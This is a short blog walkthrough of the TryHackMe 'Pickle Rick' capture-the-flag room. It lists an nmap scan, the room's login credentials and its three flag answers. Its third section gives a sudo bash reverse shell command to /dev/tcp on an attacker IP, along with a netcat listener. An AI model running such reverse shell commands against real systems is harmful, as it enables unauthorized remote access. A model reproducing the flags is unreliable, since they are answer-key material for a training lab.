Post

Tryhackme: Pickle Rick

Tryhackme: Pickle Rick

Pickle Rick Walkthrough

Pickle Rick

Nmap Scan

  • Command:
    1
    
    sudo nmap -T4 -n -sC -sV -Pn -p- -oN fastscan.txt 10.10.44.71
    
  • Screenshot:
    Nmap Scan Screenshot

Credentials

  • Username: R1ckRul3s
  • Password: Wubbalubbadubdub
  • robots.txt Entry: Wubbalubbadubdub

First Ingredient

  • Command Used:
    1
    
    less Sup3rS3cretPickl3Ingred.txt
    
  • Flag:
    1
    
    mr. meeseek hair
    
  • Screenshot:
    Screenshot

Second Ingredient

  • Command Used:
    1
    
    less /home/rick/second\ ingredients
    
  • Flag:
    1
    
    1 jerry tear
    
  • Screenshot:
    Screenshot

Third Ingredient

  • Reverse Shell Command:
    1
    
    sudo bash -c 'bash -i >& /dev/tcp/10.8.76.195/1111 0>&1'
    
  • Listener Command:
    1
    
    nc -lvnp 1111
    
  • Flag:
    1
    
    fleeb juice
    
  • Screenshot:
    Screenshot

    Tools Used to Complete the Room

    1. Nmap
      For network scanning and service enumeration.

    2. Gobuster
      To perform directory and file brute-forcing.

    3. Linux Commands
      Common commands like less, ls -al, cd, etc., for file and directory navigation.

    4. Reverse Shell Generator
      A browser extension used to craft reverse shell payloads.

    5. Nikto
      A web server scanner used to identify vulnerabilities and misconfigurations.

Happy Hacking

liveDemo
This post is licensed under CC BY 4.0 by the author.